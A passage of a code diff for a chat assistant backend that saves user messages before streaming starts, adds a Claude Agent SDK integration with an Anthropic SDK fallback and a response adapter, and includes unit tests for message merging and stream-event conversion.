logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
# Not critical - title will be correct on next full cache refresh
logger.warning(
f"Failed to update title in cache for session {session_id}: {e}"
)
return True
except Exception as e:

View File

@@ -1,16 +1,4 @@
from typing import cast
import pytest
from openai.types.chat import (
ChatCompletionAssistantMessageParam,
ChatCompletionMessageParam,
ChatCompletionToolMessageParam,
ChatCompletionUserMessageParam,
)
from openai.types.chat.chat_completion_message_tool_call_param import (
ChatCompletionMessageToolCallParam,
Function,
)
from .model import (
ChatMessage,
@@ -129,205 +117,3 @@ async def test_chatsession_db_storage(setup_test_user, test_user_id):
loaded.tool_calls is not None
), f"Tool calls missing for {orig.role} message"
assert len(orig.tool_calls) == len(loaded.tool_calls)
# --------------------------------------------------------------------------- #
# _merge_consecutive_assistant_messages #
# --------------------------------------------------------------------------- #
_tc = ChatCompletionMessageToolCallParam(
id="tc1", type="function", function=Function(name="do_stuff", arguments="{}")
)
_tc2 = ChatCompletionMessageToolCallParam(
id="tc2", type="function", function=Function(name="other", arguments="{}")
)
def test_merge_noop_when_no_consecutive_assistants():
"""Messages without consecutive assistants are returned unchanged."""
msgs = [
ChatCompletionUserMessageParam(role="user", content="hi"),
ChatCompletionAssistantMessageParam(role="assistant", content="hello"),
ChatCompletionUserMessageParam(role="user", content="bye"),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs)
assert len(merged) == 3
assert [m["role"] for m in merged] == ["user", "assistant", "user"]
def test_merge_splits_text_and_tool_calls():
"""The exact bug scenario: text-only assistant followed by tool_calls-only assistant."""
msgs = [
ChatCompletionUserMessageParam(role="user", content="build agent"),
ChatCompletionAssistantMessageParam(
role="assistant", content="Let me build that"
),
ChatCompletionAssistantMessageParam(
role="assistant", content="", tool_calls=[_tc]
),
ChatCompletionToolMessageParam(role="tool", content="ok", tool_call_id="tc1"),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs)
assert len(merged) == 3
assert merged[0]["role"] == "user"
assert merged[2]["role"] == "tool"
a = cast(ChatCompletionAssistantMessageParam, merged[1])
assert a["role"] == "assistant"
assert a.get("content") == "Let me build that"
assert a.get("tool_calls") == [_tc]
def test_merge_combines_tool_calls_from_both():
"""Both consecutive assistants have tool_calls — they get merged."""
msgs: list[ChatCompletionAssistantMessageParam] = [
ChatCompletionAssistantMessageParam(
role="assistant", content="text", tool_calls=[_tc]
),
ChatCompletionAssistantMessageParam(
role="assistant", content="", tool_calls=[_tc2]
),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs) # type: ignore[arg-type]
assert len(merged) == 1
a = cast(ChatCompletionAssistantMessageParam, merged[0])
assert a.get("tool_calls") == [_tc, _tc2]
assert a.get("content") == "text"
def test_merge_three_consecutive_assistants():
"""Three consecutive assistants collapse into one."""
msgs: list[ChatCompletionAssistantMessageParam] = [
ChatCompletionAssistantMessageParam(role="assistant", content="a"),
ChatCompletionAssistantMessageParam(role="assistant", content="b"),
ChatCompletionAssistantMessageParam(
role="assistant", content="", tool_calls=[_tc]
),
]
merged = ChatSession._merge_consecutive_assistant_messages(msgs) # type: ignore[arg-type]
assert len(merged) == 1
a = cast(ChatCompletionAssistantMessageParam, merged[0])
assert a.get("content") == "a\nb"
assert a.get("tool_calls") == [_tc]
def test_merge_empty_and_single_message():
"""Edge cases: empty list and single message."""
assert ChatSession._merge_consecutive_assistant_messages([]) == []
single: list[ChatCompletionMessageParam] = [
ChatCompletionUserMessageParam(role="user", content="hi")
]
assert ChatSession._merge_consecutive_assistant_messages(single) == single
# --------------------------------------------------------------------------- #
# add_tool_call_to_current_turn #
# --------------------------------------------------------------------------- #
_raw_tc = {
"id": "tc1",
"type": "function",
"function": {"name": "f", "arguments": "{}"},
}
_raw_tc2 = {
"id": "tc2",
"type": "function",
"function": {"name": "g", "arguments": "{}"},
}
def test_add_tool_call_appends_to_existing_assistant():
"""When the last assistant is from the current turn, tool_call is added to it."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="hi"),
ChatMessage(role="assistant", content="working on it"),
]
session.add_tool_call_to_current_turn(_raw_tc)
assert len(session.messages) == 2 # no new message created
assert session.messages[1].tool_calls == [_raw_tc]
def test_add_tool_call_creates_assistant_when_none_exists():
"""When there's no current-turn assistant, a new one is created."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="hi"),
]
session.add_tool_call_to_current_turn(_raw_tc)
assert len(session.messages) == 2
assert session.messages[1].role == "assistant"
assert session.messages[1].tool_calls == [_raw_tc]
def test_add_tool_call_does_not_cross_user_boundary():
"""A user message acts as a boundary — previous assistant is not modified."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="assistant", content="old turn"),
ChatMessage(role="user", content="new message"),
]
session.add_tool_call_to_current_turn(_raw_tc)
assert len(session.messages) == 3 # new assistant was created
assert session.messages[0].tool_calls is None # old assistant untouched
assert session.messages[2].role == "assistant"
assert session.messages[2].tool_calls == [_raw_tc]
def test_add_tool_call_multiple_times():
"""Multiple long-running tool calls accumulate on the same assistant."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="hi"),
ChatMessage(role="assistant", content="doing stuff"),
]
session.add_tool_call_to_current_turn(_raw_tc)
# Simulate a pending tool result in between (like _yield_tool_call does)
session.messages.append(
ChatMessage(role="tool", content="pending", tool_call_id="tc1")
)
session.add_tool_call_to_current_turn(_raw_tc2)
assert len(session.messages) == 3 # user, assistant, tool — no extra assistant
assert session.messages[1].tool_calls == [_raw_tc, _raw_tc2]
def test_to_openai_messages_merges_split_assistants():
"""End-to-end: session with split assistants produces valid OpenAI messages."""
session = ChatSession.new(user_id="u")
session.messages = [
ChatMessage(role="user", content="build agent"),
ChatMessage(role="assistant", content="Let me build that"),
ChatMessage(
role="assistant",
content="",
tool_calls=[
{
"id": "tc1",
"type": "function",
"function": {"name": "create_agent", "arguments": "{}"},
}
],
),
ChatMessage(role="tool", content="done", tool_call_id="tc1"),
ChatMessage(role="assistant", content="Saved!"),
ChatMessage(role="user", content="show me an example run"),
]
openai_msgs = session.to_openai_messages()
# The two consecutive assistants at index 1,2 should be merged
roles = [m["role"] for m in openai_msgs]
assert roles == ["user", "assistant", "tool", "assistant", "user"]
# The merged assistant should have both content and tool_calls
merged = cast(ChatCompletionAssistantMessageParam, openai_msgs[1])
assert merged.get("content") == "Let me build that"
tc_list = merged.get("tool_calls")
assert tc_list is not None and len(list(tc_list)) == 1
assert list(tc_list)[0]["id"] == "tc1"

View File

@@ -1,5 +1,6 @@
"""Chat API routes for chat session management and streaming via SSE."""
import asyncio
import logging
import uuid as uuid_module
from collections.abc import AsyncGenerator
@@ -16,8 +17,16 @@ from . import service as chat_service
from . import stream_registry
from .completion_handler import process_operation_failure, process_operation_success
from .config import ChatConfig
from .model import ChatSession, create_chat_session, get_chat_session, get_user_sessions
from .response_model import StreamFinish, StreamHeartbeat
from .model import (
ChatMessage,
ChatSession,
append_and_save_message,
create_chat_session,
get_chat_session,
get_user_sessions,
)
from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
from .sdk import service as sdk_service
from .tools.models import (
AgentDetailsResponse,
AgentOutputResponse,
@@ -40,6 +49,7 @@ from .tools.models import (
SetupRequirementsResponse,
UnderstandingUpdatedResponse,
)
from .tracking import track_user_message
config = ChatConfig()
@@ -231,6 +241,10 @@ async def get_session(
active_task, last_message_id = await stream_registry.get_active_task_for_session(
session_id, user_id
)
logger.info(
f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
)
if active_task:
# Filter out the in-progress assistant message from the session response.
# The client will receive the complete assistant response through the SSE
@@ -300,10 +314,9 @@ async def stream_chat_post(
f"user={user_id}, message_len={len(request.message)}",
extra={"json_fields": log_meta},
)
session = await _validate_and_get_session(session_id, user_id)
logger.info(
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time)*1000:.1f}ms",
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
@@ -312,6 +325,25 @@ async def stream_chat_post(
},
)
# Atomically append user message to session BEFORE creating task to avoid
# race condition where GET_SESSION sees task as "running" but message isn't
# saved yet. append_and_save_message re-fetches inside a lock to prevent
# message loss from concurrent requests.
if request.message:
message = ChatMessage(
role="user" if request.is_user_message else "assistant",
content=request.message,
)
if request.is_user_message:
track_user_message(
user_id=user_id,
session_id=session_id,
message_length=len(request.message),
)
logger.info(f"[STREAM] Saving user message to session {session_id}")
session = await append_and_save_message(session_id, message)
logger.info(f"[STREAM] User message saved for session {session_id}")
# Create a task in the stream registry for reconnection support
task_id = str(uuid_module.uuid4())
operation_id = str(uuid_module.uuid4())
@@ -327,7 +359,7 @@ async def stream_chat_post(
operation_id=operation_id,
)
logger.info(
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start)*1000:.1f}ms",
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
@@ -348,15 +380,43 @@ async def stream_chat_post(
first_chunk_time, ttfc = None, None
chunk_count = 0
try:
async for chunk in chat_service.stream_chat_completion(
# Emit a start event with task_id for reconnection
start_chunk = StreamStart(messageId=task_id, taskId=task_id)
await stream_registry.publish_chunk(task_id, start_chunk)
logger.info(
f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
"elapsed_ms": (time_module.perf_counter() - gen_start_time)
* 1000,
}
},
)
# Choose service based on configuration
use_sdk = config.use_claude_agent_sdk
stream_fn = (
sdk_service.stream_chat_completion_sdk
if use_sdk
else chat_service.stream_chat_completion
)
logger.info(
f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
extra={"json_fields": log_meta},
)
# Pass message=None since we already added it to the session above
async for chunk in stream_fn(
session_id,
request.message,
None, # Message already in session
is_user_message=request.is_user_message,
user_id=user_id,
session=session, # Pass pre-fetched session to avoid double-fetch
session=session, # Pass session with message already added
context=request.context,
_task_id=task_id, # Pass task_id so service emits start with taskId for reconnection
):
# Skip duplicate StreamStart — we already published one above
if isinstance(chunk, StreamStart):
continue
chunk_count += 1
if first_chunk_time is None:
first_chunk_time = time_module.perf_counter()
@@ -377,7 +437,7 @@ async def stream_chat_post(
gen_end_time = time_module.perf_counter()
total_time = (gen_end_time - gen_start_time) * 1000
logger.info(
f"[TIMING] run_ai_generation FINISHED in {total_time/1000:.1f}s; "
f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
f"task={task_id}, session={session_id}, "
f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
extra={
@@ -404,6 +464,17 @@ async def stream_chat_post(
}
},
)
# Publish a StreamError so the frontend can display an error message
try:
await stream_registry.publish_chunk(
task_id,
StreamError(
errorText="An error occurred. Please try again.",
code="stream_error",
),
)
except Exception:
pass # Best-effort; mark_task_completed will publish StreamFinish
await stream_registry.mark_task_completed(task_id, "failed")
# Start the AI generation in a background task
@@ -506,8 +577,14 @@ async def stream_chat_post(
"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
},
)
# Surface error to frontend so it doesn't appear stuck
yield StreamError(
errorText="An error occurred. Please try again.",
code="stream_error",
).to_sse()
yield StreamFinish().to_sse()
finally:
# Unsubscribe when client disconnects or stream ends to prevent resource leak
# Unsubscribe when client disconnects or stream ends
if subscriber_queue is not None:
try:
await stream_registry.unsubscribe_from_task(
@@ -751,8 +828,6 @@ async def stream_task(
)
async def event_generator() -> AsyncGenerator[str, None]:
import asyncio
heartbeat_interval = 15.0 # Send heartbeat every 15 seconds
try:
while True:

View File

@@ -0,0 +1,14 @@
"""Claude Agent SDK integration for CoPilot.
This module provides the integration layer between the Claude Agent SDK
and the existing CoPilot tool system, enabling drop-in replacement of
the current LLM orchestration with the battle-tested Claude Agent SDK.
"""
from .service import stream_chat_completion_sdk
from .tool_adapter import create_copilot_mcp_server
__all__ = [
"stream_chat_completion_sdk",
"create_copilot_mcp_server",
]

View File

@@ -0,0 +1,363 @@
"""Anthropic SDK fallback implementation.
This module provides the fallback streaming implementation using the Anthropic SDK
directly when the Claude Agent SDK is not available.
"""
import json
import logging
import uuid
from collections.abc import AsyncGenerator
from typing import Any, cast
from ..config import ChatConfig
from ..model import ChatMessage, ChatSession
from ..response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
StreamUsage,
)
from .tool_adapter import get_tool_definitions, get_tool_handlers
logger = logging.getLogger(__name__)
config = ChatConfig()
# Maximum tool-call iterations before stopping to prevent infinite loops
_MAX_TOOL_ITERATIONS = 10
async def stream_with_anthropic(
session: ChatSession,
system_prompt: str,
text_block_id: str,
) -> AsyncGenerator[StreamBaseResponse, None]:
"""Stream using Anthropic SDK directly with tool calling support.
This function accumulates messages into the session for persistence.
The caller should NOT yield an additional StreamFinish - this function handles it.
"""
import anthropic
# Use config.api_key (CHAT_API_KEY > OPEN_ROUTER_API_KEY > OPENAI_API_KEY)
# with config.base_url for OpenRouter routing — matching the non-SDK path.
api_key = config.api_key
if not api_key:
yield StreamError(
errorText="No API key configured (set CHAT_API_KEY or OPENAI_API_KEY)",
code="config_error",
)
yield StreamFinish()
return
# Build kwargs for the Anthropic client — use base_url if configured
client_kwargs: dict[str, Any] = {"api_key": api_key}
if config.base_url:
# Strip /v1 suffix — Anthropic SDK adds its own version path
base = config.base_url.rstrip("/")
if base.endswith("/v1"):
base = base[:-3]
client_kwargs["base_url"] = base
client = anthropic.AsyncAnthropic(**client_kwargs)
tool_definitions = get_tool_definitions()
tool_handlers = get_tool_handlers()
anthropic_tools = [
{
"name": t["name"],
"description": t["description"],
"input_schema": t["inputSchema"],
}
for t in tool_definitions
]
anthropic_messages = _convert_session_to_anthropic(session)
if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
anthropic_messages.append(
{"role": "user", "content": "Continue with the task."}
)
has_started_text = False
accumulated_text = ""
accumulated_tool_calls: list[dict[str, Any]] = []
for _ in range(_MAX_TOOL_ITERATIONS):
try:
async with client.messages.stream(
model=(
config.model.split("/")[-1] if "/" in config.model else config.model
),
max_tokens=4096,
system=system_prompt,
messages=cast(Any, anthropic_messages),
tools=cast(Any, anthropic_tools) if anthropic_tools else [],
) as stream:
async for event in stream:
if event.type == "content_block_start":
block = event.content_block
if hasattr(block, "type"):
if block.type == "text" and not has_started_text:
yield StreamTextStart(id=text_block_id)
has_started_text = True
elif block.type == "tool_use":
yield StreamToolInputStart(
toolCallId=block.id, toolName=block.name
)
elif event.type == "content_block_delta":
delta = event.delta
if hasattr(delta, "type") and delta.type == "text_delta":
accumulated_text += delta.text
yield StreamTextDelta(id=text_block_id, delta=delta.text)
final_message = await stream.get_final_message()
if final_message.stop_reason == "tool_use":
if has_started_text:
yield StreamTextEnd(id=text_block_id)
has_started_text = False
text_block_id = str(uuid.uuid4())
tool_results = []
assistant_content: list[dict[str, Any]] = []
for block in final_message.content:
if block.type == "text":
assistant_content.append(
{"type": "text", "text": block.text}
)
elif block.type == "tool_use":
assistant_content.append(
{
"type": "tool_use",
"id": block.id,
"name": block.name,
"input": block.input,
}
)
# Track tool call for session persistence
accumulated_tool_calls.append(
{
"id": block.id,
"type": "function",
"function": {
"name": block.name,
"arguments": json.dumps(
block.input
if isinstance(block.input, dict)
else {}
),
},
}
)
yield StreamToolInputAvailable(
toolCallId=block.id,
toolName=block.name,
input=(
block.input if isinstance(block.input, dict) else {}
),
)
output, is_error = await _execute_tool(
block.name, block.input, tool_handlers
)
yield StreamToolOutputAvailable(
toolCallId=block.id,
toolName=block.name,
output=output,
success=not is_error,
)
# Save tool result to session
session.messages.append(
ChatMessage(
role="tool",
content=output,
tool_call_id=block.id,
)
)
tool_results.append(
{
"type": "tool_result",
"tool_use_id": block.id,
"content": output,
"is_error": is_error,
}
)
# Save assistant message with tool calls to session
session.messages.append(
ChatMessage(
role="assistant",
content=accumulated_text or None,
tool_calls=(
accumulated_tool_calls
if accumulated_tool_calls
else None
),
)
)
# Reset for next iteration
accumulated_text = ""
accumulated_tool_calls = []
anthropic_messages.append(
{"role": "assistant", "content": assistant_content}
)
anthropic_messages.append({"role": "user", "content": tool_results})
continue
else:
if has_started_text:
yield StreamTextEnd(id=text_block_id)
# Save final assistant response to session
if accumulated_text:
session.messages.append(
ChatMessage(role="assistant", content=accumulated_text)
)
yield StreamUsage(
promptTokens=final_message.usage.input_tokens,
completionTokens=final_message.usage.output_tokens,
totalTokens=final_message.usage.input_tokens
+ final_message.usage.output_tokens,
)
yield StreamFinish()
return
except Exception as e:
logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
yield StreamError(
errorText="An error occurred. Please try again.",
code="anthropic_error",
)
yield StreamFinish()
return
yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
yield StreamFinish()
def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
"""Convert session messages to Anthropic format.
Handles merging consecutive same-role messages (Anthropic requires alternating roles).
"""
messages: list[dict[str, Any]] = []
for msg in session.messages:
if msg.role == "user":
new_msg = {"role": "user", "content": msg.content or ""}
elif msg.role == "assistant":
content: list[dict[str, Any]] = []
if msg.content:
content.append({"type": "text", "text": msg.content})
if msg.tool_calls:
for tc in msg.tool_calls:
func = tc.get("function", {})
args = func.get("arguments", {})
if isinstance(args, str):
try:
args = json.loads(args)
except json.JSONDecodeError:
args = {}
content.append(
{
"type": "tool_use",
"id": tc.get("id", str(uuid.uuid4())),
"name": func.get("name", ""),
"input": args,
}
)
if content:
new_msg = {"role": "assistant", "content": content}
else:
continue # Skip empty assistant messages
elif msg.role == "tool":
new_msg = {
"role": "user",
"content": [
{
"type": "tool_result",
"tool_use_id": msg.tool_call_id or "",
"content": msg.content or "",
}
],
}
else:
continue
messages.append(new_msg)
# Merge consecutive same-role messages (Anthropic requires alternating roles)
return _merge_consecutive_roles(messages)
def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
"""Merge consecutive messages with the same role.
Anthropic API requires alternating user/assistant roles.
"""
if not messages:
return []
merged: list[dict[str, Any]] = []
for msg in messages:
if merged and merged[-1]["role"] == msg["role"]:
# Merge with previous message
prev_content = merged[-1]["content"]
new_content = msg["content"]
# Normalize both to list-of-blocks form
if isinstance(prev_content, str):
prev_content = [{"type": "text", "text": prev_content}]
if isinstance(new_content, str):
new_content = [{"type": "text", "text": new_content}]
# Ensure both are lists
if not isinstance(prev_content, list):
prev_content = [prev_content]
if not isinstance(new_content, list):
new_content = [new_content]
merged[-1]["content"] = prev_content + new_content
else:
merged.append(msg)
return merged
async def _execute_tool(
tool_name: str, tool_input: Any, handlers: dict[str, Any]
) -> tuple[str, bool]:
"""Execute a tool and return (output, is_error)."""
handler = handlers.get(tool_name)
if not handler:
return f"Unknown tool: {tool_name}", True
try:
result = await handler(tool_input)
# Safely extract output - handle empty or missing content
content = result.get("content") or []
if content and isinstance(content, list) and len(content) > 0:
first_item = content[0]
output = first_item.get("text", "") if isinstance(first_item, dict) else ""
else:
output = ""
is_error = result.get("isError", False)
return output, is_error
except Exception as e:
return f"Error: {str(e)}", True

View File

@@ -0,0 +1,212 @@
"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
This module provides the adapter layer that converts streaming messages from
the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
the frontend expects.
"""
import json
import logging
import uuid
from claude_agent_sdk import (
AssistantMessage,
Message,
ResultMessage,
SystemMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
from backend.api.features.chat.response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamFinishStep,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
StreamUsage,
)
from backend.api.features.chat.sdk.tool_adapter import (
MCP_TOOL_PREFIX,
pop_pending_tool_output,
)
logger = logging.getLogger(__name__)
class SDKResponseAdapter:
"""Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
This class maintains state during a streaming session to properly track
text blocks, tool calls, and message lifecycle.
"""
def __init__(self, message_id: str | None = None):
self.message_id = message_id or str(uuid.uuid4())
self.text_block_id = str(uuid.uuid4())
self.has_started_text = False
self.has_ended_text = False
self.current_tool_calls: dict[str, dict[str, str]] = {}
self.task_id: str | None = None
self.step_open = False
def set_task_id(self, task_id: str) -> None:
"""Set the task ID for reconnection support."""
self.task_id = task_id
def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
"""Convert a single SDK message to Vercel AI SDK format."""
responses: list[StreamBaseResponse] = []
if isinstance(sdk_message, SystemMessage):
if sdk_message.subtype == "init":
responses.append(
StreamStart(messageId=self.message_id, taskId=self.task_id)
)
# Open the first step (matches non-SDK: StreamStart then StreamStartStep)
responses.append(StreamStartStep())
self.step_open = True
elif isinstance(sdk_message, AssistantMessage):
# After tool results, the SDK sends a new AssistantMessage for the
# next LLM turn. Open a new step if the previous one was closed.
if not self.step_open:
responses.append(StreamStartStep())
self.step_open = True
for block in sdk_message.content:
if isinstance(block, TextBlock):
if block.text:
self._ensure_text_started(responses)
responses.append(
StreamTextDelta(id=self.text_block_id, delta=block.text)
)
elif isinstance(block, ToolUseBlock):
self._end_text_if_open(responses)
# Strip MCP prefix so frontend sees "find_block"
# instead of "mcp__copilot__find_block".
tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)
responses.append(
StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
)
responses.append(
StreamToolInputAvailable(
toolCallId=block.id,
toolName=tool_name,
input=block.input,
)
)
self.current_tool_calls[block.id] = {"name": tool_name}
elif isinstance(sdk_message, UserMessage):
# UserMessage carries tool results back from tool execution.
content = sdk_message.content
blocks = content if isinstance(content, list) else []
for block in blocks:
if isinstance(block, ToolResultBlock) and block.tool_use_id:
tool_info = self.current_tool_calls.get(block.tool_use_id, {})
tool_name = tool_info.get("name", "unknown")
# Prefer the stashed full output over the SDK's
# (potentially truncated) ToolResultBlock content.
# The SDK truncates large results, writing them to disk,
# which breaks frontend widget parsing.
output = pop_pending_tool_output(tool_name) or (
_extract_tool_output(block.content)
)
responses.append(
StreamToolOutputAvailable(
toolCallId=block.tool_use_id,
toolName=tool_name,
output=output,
success=not (block.is_error or False),
)
)
# Close the current step after tool results — the next
# AssistantMessage will open a new step for the continuation.
if self.step_open:
responses.append(StreamFinishStep())
self.step_open = False
elif isinstance(sdk_message, ResultMessage):
self._end_text_if_open(responses)
# Close the step before finishing.
if self.step_open:
responses.append(StreamFinishStep())
self.step_open = False
# Emit token usage if the SDK reported it
usage = getattr(sdk_message, "usage", None) or {}
if usage:
input_tokens = usage.get("input_tokens", 0)
output_tokens = usage.get("output_tokens", 0)
responses.append(
StreamUsage(
promptTokens=input_tokens,
completionTokens=output_tokens,
totalTokens=input_tokens + output_tokens,
)
)
if sdk_message.subtype == "success":
responses.append(StreamFinish())
elif sdk_message.subtype in ("error", "error_during_execution"):
error_msg = getattr(sdk_message, "result", None) or "Unknown error"
responses.append(
StreamError(errorText=str(error_msg), code="sdk_error")
)
responses.append(StreamFinish())
else:
logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")
return responses
def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
"""Start (or restart) a text block if needed."""
if not self.has_started_text or self.has_ended_text:
if self.has_ended_text:
self.text_block_id = str(uuid.uuid4())
self.has_ended_text = False
responses.append(StreamTextStart(id=self.text_block_id))
self.has_started_text = True
def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
"""End the current text block if one is open."""
if self.has_started_text and not self.has_ended_text:
responses.append(StreamTextEnd(id=self.text_block_id))
self.has_ended_text = True
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
"""Extract a string output from a ToolResultBlock's content field."""
if isinstance(content, str):
return content
if isinstance(content, list):
parts = [item.get("text", "") for item in content if item.get("type") == "text"]
if parts:
return "".join(parts)
try:
return json.dumps(content)
except (TypeError, ValueError):
return str(content)
if content is None:
return ""
try:
return json.dumps(content)
except (TypeError, ValueError):
return str(content)
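# Minimal driver sketch: how a streaming loop is expected to use this adapter.
# `client` is assumed to be an already-connected ClaudeSDKClient; each SDK
# message converts into zero or more Vercel AI SDK-style stream parts.
async def _example_drive_adapter(client, adapter: SDKResponseAdapter):
    async for sdk_msg in client.receive_messages():
        events = adapter.convert_message(sdk_msg)
        for event in events:
            yield event
        if any(isinstance(e, StreamFinish) for e in events):
            break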


@@ -0,0 +1,366 @@
"""Unit tests for the SDK response adapter."""
from claude_agent_sdk import (
AssistantMessage,
ResultMessage,
SystemMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
from backend.api.features.chat.response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamFinishStep,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
)
from .response_adapter import SDKResponseAdapter
from .tool_adapter import MCP_TOOL_PREFIX
def _adapter() -> SDKResponseAdapter:
a = SDKResponseAdapter(message_id="msg-1")
a.set_task_id("task-1")
return a
# -- SystemMessage -----------------------------------------------------------
def test_system_init_emits_start_and_step():
adapter = _adapter()
results = adapter.convert_message(SystemMessage(subtype="init", data={}))
assert len(results) == 2
assert isinstance(results[0], StreamStart)
assert results[0].messageId == "msg-1"
assert results[0].taskId == "task-1"
assert isinstance(results[1], StreamStartStep)
def test_system_non_init_emits_nothing():
adapter = _adapter()
results = adapter.convert_message(SystemMessage(subtype="other", data={}))
assert results == []
# -- AssistantMessage with TextBlock -----------------------------------------
def test_text_block_emits_step_start_and_delta():
adapter = _adapter()
msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
results = adapter.convert_message(msg)
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamTextStart)
assert isinstance(results[2], StreamTextDelta)
assert results[2].delta == "hello"
def test_empty_text_block_emits_only_step():
adapter = _adapter()
msg = AssistantMessage(content=[TextBlock(text="")], model="test")
results = adapter.convert_message(msg)
# Empty text skipped, but step still opens
assert len(results) == 1
assert isinstance(results[0], StreamStartStep)
def test_multiple_text_deltas_reuse_block_id():
adapter = _adapter()
msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
r1 = adapter.convert_message(msg1)
r2 = adapter.convert_message(msg2)
# First gets step+start+delta, second only delta (block & step already started)
assert len(r1) == 3
assert isinstance(r1[0], StreamStartStep)
assert isinstance(r1[1], StreamTextStart)
assert len(r2) == 1
assert isinstance(r2[0], StreamTextDelta)
assert r1[1].id == r2[0].id # same block ID
# -- AssistantMessage with ToolUseBlock --------------------------------------
def test_tool_use_emits_input_start_and_available():
"""Tool names arrive with MCP prefix and should be stripped for the frontend."""
adapter = _adapter()
msg = AssistantMessage(
content=[
ToolUseBlock(
id="tool-1",
name=f"{MCP_TOOL_PREFIX}find_agent",
input={"q": "x"},
)
],
model="test",
)
results = adapter.convert_message(msg)
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamToolInputStart)
assert results[1].toolCallId == "tool-1"
assert results[1].toolName == "find_agent" # prefix stripped
assert isinstance(results[2], StreamToolInputAvailable)
assert results[2].toolName == "find_agent" # prefix stripped
assert results[2].input == {"q": "x"}
def test_text_then_tool_ends_text_block():
adapter = _adapter()
text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
tool_msg = AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
adapter.convert_message(text_msg) # opens step + text
results = adapter.convert_message(tool_msg)
# Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
assert len(results) == 3
assert isinstance(results[0], StreamTextEnd)
assert isinstance(results[1], StreamToolInputStart)
# -- UserMessage with ToolResultBlock ----------------------------------------
def test_tool_result_emits_output_and_finish_step():
adapter = _adapter()
# First register the tool call (opens step) — SDK sends prefixed name
tool_msg = AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
model="test",
)
adapter.convert_message(tool_msg)
# Now send tool result
result_msg = UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
)
results = adapter.convert_message(result_msg)
assert len(results) == 2
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].toolCallId == "t1"
assert results[0].toolName == "find_agent" # prefix stripped
assert results[0].output == "found 3 agents"
assert results[0].success is True
assert isinstance(results[1], StreamFinishStep)
def test_tool_result_error():
adapter = _adapter()
adapter.convert_message(
AssistantMessage(
content=[
ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
],
model="test",
)
)
result_msg = UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
)
results = adapter.convert_message(result_msg)
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].success is False
assert isinstance(results[1], StreamFinishStep)
def test_tool_result_list_content():
adapter = _adapter()
adapter.convert_message(
AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
)
result_msg = UserMessage(
content=[
ToolResultBlock(
tool_use_id="t1",
content=[
{"type": "text", "text": "line1"},
{"type": "text", "text": "line2"},
],
)
]
)
results = adapter.convert_message(result_msg)
assert isinstance(results[0], StreamToolOutputAvailable)
